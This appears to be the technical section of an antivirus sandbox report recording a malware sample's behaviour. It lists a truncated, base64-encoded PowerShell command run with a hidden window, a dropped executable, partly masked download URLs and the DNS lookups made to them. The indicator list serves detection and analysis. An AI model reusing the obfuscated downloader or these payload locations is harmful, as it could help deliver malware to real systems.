Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAtAGkAdABFAE0AIAAgAFYAYQBSAEkAQQBiAGwARQA6AE4AaABhADIAIAAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBvAFIAeQAnACwAJwBTAHkAUw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\938252.cvr
- %HOMEPATH%\a9bp7cb\ghpyfs_\kfhcowten.exe
- %HOMEPATH%\a9bp7cb\ghpyfs_\kfhcowten.exe
- 'wo####gpainters.com':80
- 'ge##sr.com':80
- 'in##o.co':443
- http://wo####gpainters.com/wp-content/M9/
- http://ge##sr.com/cgi-bin/PzVEVRgx1/
- http://www.ge##sr.com/cgi-bin/PzVEVRgx1/
- 'in##o.co':443
- DNS ASK pa###-box.at
- DNS ASK wo####gpainters.com
- DNS ASK ge##sr.com
- DNS ASK in##o.co
- DNS ASK lu####rownie.com
- DNS ASK un######llearndirect.com
- DNS ASK ni###napk.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAtAGkAdABFAE0AIAAgAFYAYQBSAEkAQQBiAGwARQA6AE4AaABhADIAIAAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBvAFIAeQAnACwAJwBTAHkAUw...' (со скрытым окном)